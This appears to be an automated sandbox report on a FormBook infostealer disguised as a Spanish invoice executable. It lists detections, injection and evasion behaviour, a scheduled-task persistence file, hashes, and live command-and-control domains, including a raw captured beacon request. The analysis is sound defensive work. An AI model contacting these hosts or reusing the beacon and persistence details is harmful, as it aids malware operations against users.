            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            Yara detected FormBook
            Source: Yara match; File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORY

            Remote Access Functionality:

            Yara detected FormBook

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Scheduled Task/Job 1 | Scheduled Task/Job 1 | Process Injection 512 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 221 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Scheduled Task/Job 1 | Masquerading 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 31 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 512 | LSA Secrets | File and Directory Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | System Information Discovery 112 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 4 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 13 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

            Behavior Graph

            [Behavior graph, ID 502357. Sample: Factura de proforma.exe; start date: 13/10/2021; architecture: WINDOWS; score: 100.]
            Sample signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Yara detected AntiVM3; 8 other signatures.
            Processes: Factura de proforma.exe dropped C:\Users\user\AppData\Local\...\tmpD689.tmp (XML) and C:\Users\user\AppData\...\tskpCbAwtxoaw.exe (PE32), and started RegSvcs.exe and schtasks.exe (which started conhost.exe). RegSvcs.exe injected into explorer.exe; explorer.exe started cscript.exe; cscript.exe started cmd.exe, which started conhost.exe.
            RegSvcs.exe signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures.
            explorer.exe signature: System process connects to network (likely due to code injection or exploit).
            cscript.exe signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements.
            DNS/IP: www.new-post-vehicle-site.xyz and www.festival-du-chanvre.com (sample level); parking3.dnstool.net (13.209.99.177, 49806, 80, AMAZON-02US, United States), www.palmonlae.space and www.aminobalm.com (from explorer.exe).

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            Source | Detection | Scanner | Label
            6.2.RegSvcs.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

            Domains

            No Antivirus matches

            URLs


            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            parking3.dnstool.net | 13.209.99.177 | true | true | | unknown
            www.festival-du-chanvre.com | unknown | unknown | true | | unknown
            www.aminobalm.com | unknown | unknown | true | | unknown
            www.palmonlae.space | unknown | unknown | true | | unknown
            www.new-post-vehicle-site.xyz | unknown | unknown | true | | unknown

                      Contacted URLs

            Name | Malicious | Antivirus Detection | Reputation
            http://www.aminobalm.com/cb3b/?c6=kr386M7znJup/B2j4KhdpwCgkxfUSLFq19BV4h8BDsMel0JC//DVwypubzBUvp11Q9BD&A0DXb=eZk4rh9h | true | Avira URL Cloud: safe | unknown
            www.thefanlounge.com/cb3b/ | true | Avira URL Cloud: safe | low

                      URLs from Memory and Binaries


                                              Contacted IPs

                                              Public

                                              IP | Domain | Country | ASN | ASN Name | Malicious
                                              13.209.99.177 | parking3.dnstool.net | United States | 16509 | AMAZON-02US | true

                                              General Information

                                              Joe Sandbox Version:33.0.0 White Diamond
                                              Analysis ID:502357
                                              Start date:13.10.2021
                                              Start time:20:33:12
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 11m 20s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:Factura de proforma.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:24
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@10/4@4/1
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 13.8% (good quality ratio 12.5%)
                                              • Quality average: 75.1%
                                              • Quality standard deviation: 30.9%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 88
                                              • Number of non-executed functions: 148
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                              • Excluded IPs from analysis (whitelisted): 20.82.210.154, 8.247.248.249, 8.247.248.223, 8.247.244.221, 2.20.178.10, 2.20.178.56, 20.199.120.85, 20.199.120.151, 2.20.178.33, 2.20.178.24, 20.54.110.249, 40.112.88.60, 52.251.79.25
                                              • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                              • Not all processes were analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              Time | Type | Description
                                              20:34:22 | API Interceptor | 1x Sleep call for process: Factura de proforma.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              No context

                                              ASN


                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Factura de proforma.exe.log
                                              Process:C:\Users\user\Desktop\Factura de proforma.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):1308
                                              Entropy (8bit):5.348115897127242
                                              Encrypted:false
                                              SSDEEP:24:MLUE4KJXE4qpE4Ks2E1qE4qpAE4Kzr7RKDE4KhK3VZ9pKhPKIE4oKFKHKorE4x88:MIHKtH2HKXE1qHmAHKzvRYHKhQnoPtH2
                                              MD5:832D6A22CE7798D72609B9C21B4AF152
                                              SHA1:B086DE927BFEE6039F5555CE53C397D1E59B4CA4
                                              SHA-256:9E5EE72EF293C66406AF155572BF3B0CF9DA09CC1F60ED6524AAFD65553CE551
                                              SHA-512:A1A70F76B98C2478830AE737B4F12507D859365F046C5A415E1EBE3D87FFD2B64663A31E1E5142F7C3A7FE9A6A9CB8C143C2E16E94C3DD6041D1CCABEDDD2C21
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows
                                              C:\Users\user\AppData\Local\Temp\tmpD689.tmp
                                              Process:C:\Users\user\Desktop\Factura de proforma.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1646
                                              Entropy (8bit):5.186739433298605
                                              Encrypted:false
                                              SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBTGYtn:cbh47TlNQ//rydbz9I3YODOLNdq3X
                                              MD5:1E44E6ADAE1C0CA0FD56FA664DDFE899
                                              SHA1:BED45CA5BDDB3ED71E73A72C6058ED5101440C3F
                                              SHA-256:55CBE776A65A94D258CC0EA3911132969AED0F6979BE24A24BE4C4FB9F44E20A
                                              SHA-512:0F7E8D6686C0E5DE421C909904A5116A35E5A55FA3C61388C9665A4A81B145F3B0B0247CC3ED70F07014C2EB76F51EAC224F1F4E3CAB18FB5F0506BF49A42BCA
                                              Malicious:true
                                              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                              C:\Users\user\AppData\Roaming\tskpCbAwtxoaw.exe
                                              Process:C:\Users\user\Desktop\Factura de proforma.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):495616
                                              Entropy (8bit):7.503647477821442
                                              Encrypted:false
                                              SSDEEP:12288:x0K9jbtvzZPJukNeFrmndcPeGGUQSB/a:xh/plBlMFrleGfdB/
                                              MD5:16F7045EEBB451234CA8078222C5994C
                                              SHA1:99E8F263F9E34AD13CB8CD6AF1BB816DEFFB5BDE
                                              SHA-256:FF344E635B268090AAFDB8FA830E76C41F34D7CF9A9BF03ED4EDE2705008BFEF
                                              SHA-512:147D377F3F05F593E7428F5E5DD70C231E187C73DE1CDF111790156060F59047E80F382805678ECD3F946C58FCF5D80F4E16D8534F07F0F7355BEDEDB7726BB8
                                              Malicious:false
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z.fa..............0.................. ... ....@.. ....................................@.....................................O.... ............................................................................... ............... ..H............text... .... ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................H.......Lb..,O......Y...x...Pk...........................................0..V.........}......*.*s....}......}......}.....(.......(......{....r...po......{....r...po.....*...0.............(....&.{.........,....8....sA...%.{.....|....(....Z.{.....|....(....Z . &.s....} ...%.}......{ ...(.........(....o........+c...+C.....X.].......,+..(.......{....Z...{....Z.{.....{....o ........X.....|....(..........-....X.....|....(..........-......,...o!.....sB........|....(.....|....(....s"
                                              C:\Users\user\AppData\Roaming\tskpCbAwtxoaw.exe:Zone.Identifier
                                              Process:C:\Users\user\Desktop\Factura de proforma.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:false
                                              Preview: [ZoneTransfer]....ZoneId=0

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.503647477821442
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              File name:Factura de proforma.exe
                                              File size:495616
                                              MD5:16f7045eebb451234ca8078222c5994c
                                              SHA1:99e8f263f9e34ad13cb8cd6af1bb816deffb5bde
                                              SHA256:ff344e635b268090aafdb8fa830e76c41f34d7cf9a9bf03ed4ede2705008bfef
                                              SHA512:147d377f3f05f593e7428f5e5dd70c231e187c73de1cdf111790156060f59047e80f382805678ecd3f946c58fcf5d80f4e16d8534f07f0f7355bededb7726bb8
                                              SSDEEP:12288:x0K9jbtvzZPJukNeFrmndcPeGGUQSB/a:xh/plBlMFrleGfdB/
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z.fa..............0.................. ... ....@.. ....................................@................................

                                              File Icon

                                              Icon Hash:c4b28ed696aa92c0

                                              Static PE Info

                                              General

                                              Entrypoint:0x461d1a
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp:0x6166B25A [Wed Oct 13 10:18:02 2021 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:v4.0.30319
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al

                                              Data Directories

                                              Name | Virtual Address | Virtual Size | Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x61cc8 | 0x4f | .text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x62000 | 0x18c84 | .rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7c000 | 0xc | .reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                              Sections

                                              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                              .text | 0x2000 | 0x5fd20 | 0x5fe00 | False | 0.887357908246 | data | 7.7904887088 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rsrc | 0x62000 | 0x18c84 | 0x18e00 | False | 0.195302685302 | data | 5.06927966627 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc | 0x7c000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              Name | RVA | Size | Type | Language | Country
                                              RT_ICON | 0x62180 | 0x468 | GLS_BINARY_LSB_FIRST | |
                                              RT_ICON | 0x625f8 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0 | |
                                              RT_ICON | 0x636b0 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | |
                                              RT_ICON | 0x65c68 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | |
                                              RT_ICON | 0x69ea0 | 0x10828 | dBase III DBT, version number 0, next free block index 40 | |
                                              RT_GROUP_ICON | 0x7a6d8 | 0x4c | data | |
                                              RT_VERSION | 0x7a734 | 0x350 | data | |
                                              RT_MANIFEST | 0x7aa94 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                              Imports

                                              DLL | Import
                                              mscoree.dll | _CorExeMain

                                              Version Infos

                                              Description | Data
                                              Translation | 0x0000 0x04b0
                                              LegalCopyright | Copyright Gottschalks 2011
                                              Assembly Version | 1.0.0.0
                                              InternalName | CachedDa.exe
                                              FileVersion | 1.0.0.0
                                              CompanyName | Gottschalks
                                              LegalTrademarks |
                                              Comments |
                                              ProductName | MapEditor1
                                              ProductVersion | 1.0.0.0
                                              FileDescription | MapEditor1
                                              OriginalFilename | CachedDa.exe

                                              Network Behavior

                                              TCP Packets

                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Oct 13, 2021 20:36:07.331458092 CEST | 49806 | 80 | 192.168.2.3 | 13.209.99.177
                                              Oct 13, 2021 20:36:07.588181019 CEST | 80 | 49806 | 13.209.99.177 | 192.168.2.3
                                              Oct 13, 2021 20:36:07.588268042 CEST | 49806 | 80 | 192.168.2.3 | 13.209.99.177
                                              Oct 13, 2021 20:36:07.588450909 CEST | 49806 | 80 | 192.168.2.3 | 13.209.99.177
                                              Oct 13, 2021 20:36:07.845433950 CEST | 80 | 49806 | 13.209.99.177 | 192.168.2.3
                                              Oct 13, 2021 20:36:07.845493078 CEST | 80 | 49806 | 13.209.99.177 | 192.168.2.3
                                              Oct 13, 2021 20:36:07.845526934 CEST | 80 | 49806 | 13.209.99.177 | 192.168.2.3
                                              Oct 13, 2021 20:36:07.845746040 CEST | 49806 | 80 | 192.168.2.3 | 13.209.99.177
                                              Oct 13, 2021 20:36:07.845786095 CEST | 49806 | 80 | 192.168.2.3 | 13.209.99.177
                                              Oct 13, 2021 20:36:08.103004932 CEST | 80 | 49806 | 13.209.99.177 | 192.168.2.3

                                              UDP Packets

                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Oct 13, 2021 20:35:46.794310093 CEST | 56527 | 53 | 192.168.2.3 | 8.8.8.8
                                              Oct 13, 2021 20:35:46.817334890 CEST | 53 | 56527 | 8.8.8.8 | 192.168.2.3
                                              Oct 13, 2021 20:36:07.032196999 CEST | 58058 | 53 | 192.168.2.3 | 8.8.8.8
                                              Oct 13, 2021 20:36:07.327236891 CEST | 53 | 58058 | 8.8.8.8 | 192.168.2.3
                                              Oct 13, 2021 20:36:29.043936014 CEST | 51539 | 53 | 192.168.2.3 | 8.8.8.8
                                              Oct 13, 2021 20:36:29.067773104 CEST | 53 | 51539 | 8.8.8.8 | 192.168.2.3
                                              Oct 13, 2021 20:36:49.812874079 CEST | 50585 | 53 | 192.168.2.3 | 8.8.8.8
                                              Oct 13, 2021 20:36:49.838001966 CEST | 53 | 50585 | 8.8.8.8 | 192.168.2.3

                                              DNS Queries

                                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                              Oct 13, 2021 20:35:46.794310093 CEST | 192.168.2.3 | 8.8.8.8 | 0x6e9c | Standard query (0) | www.palmonlae.space | A (IP address) | IN (0x0001)
                                              Oct 13, 2021 20:36:07.032196999 CEST | 192.168.2.3 | 8.8.8.8 | 0xa477 | Standard query (0) | www.aminobalm.com | A (IP address) | IN (0x0001)
                                              Oct 13, 2021 20:36:29.043936014 CEST | 192.168.2.3 | 8.8.8.8 | 0x9873 | Standard query (0) | www.festival-du-chanvre.com | A (IP address) | IN (0x0001)
                                              Oct 13, 2021 20:36:49.812874079 CEST | 192.168.2.3 | 8.8.8.8 | 0x8184 | Standard query (0) | www.new-post-vehicle-site.xyz | A (IP address) | IN (0x0001)

                                              DNS Answers

                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                              Oct 13, 2021 20:35:46.817334890 CEST | 8.8.8.8 | 192.168.2.3 | 0x6e9c | Name error (3) | www.palmonlae.space | none | none | A (IP address) | IN (0x0001)
                                              Oct 13, 2021 20:36:07.327236891 CEST | 8.8.8.8 | 192.168.2.3 | 0xa477 | No error (0) | www.aminobalm.com | parking3.dnstool.net | | CNAME (Canonical name) | IN (0x0001)
                                              Oct 13, 2021 20:36:07.327236891 CEST | 8.8.8.8 | 192.168.2.3 | 0xa477 | No error (0) | parking3.dnstool.net | | 13.209.99.177 | A (IP address) | IN (0x0001)
                                              Oct 13, 2021 20:36:07.327236891 CEST | 8.8.8.8 | 192.168.2.3 | 0xa477 | No error (0) | parking3.dnstool.net | | 3.35.27.175 | A (IP address) | IN (0x0001)
                                              Oct 13, 2021 20:36:07.327236891 CEST | 8.8.8.8 | 192.168.2.3 | 0xa477 | No error (0) | parking3.dnstool.net | | 13.125.234.146 | A (IP address) | IN (0x0001)
                                              Oct 13, 2021 20:36:07.327236891 CEST | 8.8.8.8 | 192.168.2.3 | 0xa477 | No error (0) | parking3.dnstool.net | | 13.228.77.229 | A (IP address) | IN (0x0001)
                                              Oct 13, 2021 20:36:07.327236891 CEST | 8.8.8.8 | 192.168.2.3 | 0xa477 | No error (0) | parking3.dnstool.net | | 13.230.138.127 | A (IP address) | IN (0x0001)
                                              Oct 13, 2021 20:36:29.067773104 CEST | 8.8.8.8 | 192.168.2.3 | 0x9873 | Name error (3) | www.festival-du-chanvre.com | none | none | A (IP address) | IN (0x0001)
                                              Oct 13, 2021 20:36:49.838001966 CEST | 8.8.8.8 | 192.168.2.3 | 0x8184 | Name error (3) | www.new-post-vehicle-site.xyz | none | none | A (IP address) | IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • www.aminobalm.com

                                              HTTP Packets

                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              0 | 192.168.2.3 | 49806 | 13.209.99.177 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Oct 13, 2021 20:36:07.588450909 CEST | 5853 | OUT | GET /cb3b/?c6=kr386M7znJup/B2j4KhdpwCgkxfUSLFq19BV4h8BDsMel0JC//DVwypubzBUvp11Q9BD&A0DXb=eZk4rh9h HTTP/1.1
                                              Host: www.aminobalm.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Oct 13, 2021 20:36:07.845493078 CEST | 5853 | IN | HTTP/1.1 302 Moved Temporarily
                                              Server: nginx
                                              Date: Wed, 13 Oct 2021 18:36:07 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              Location: https://www.dotname.co.kr/customer/event/2019/20190604_landing_dotname?c6=kr386M7znJup/B2j4KhdpwCgkxfUSLFq19BV4h8BDsMel0JC//DVwypubzBUvp11Q9BD&A0DXb=eZk4rh9h
                                              X-Content-Type-Options: nosniff
                                              X-XSS-Protection: 1; mode=block
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function Name | Hook Type | Active in Processes
                                              PeekMessageA | INLINE | explorer.exe
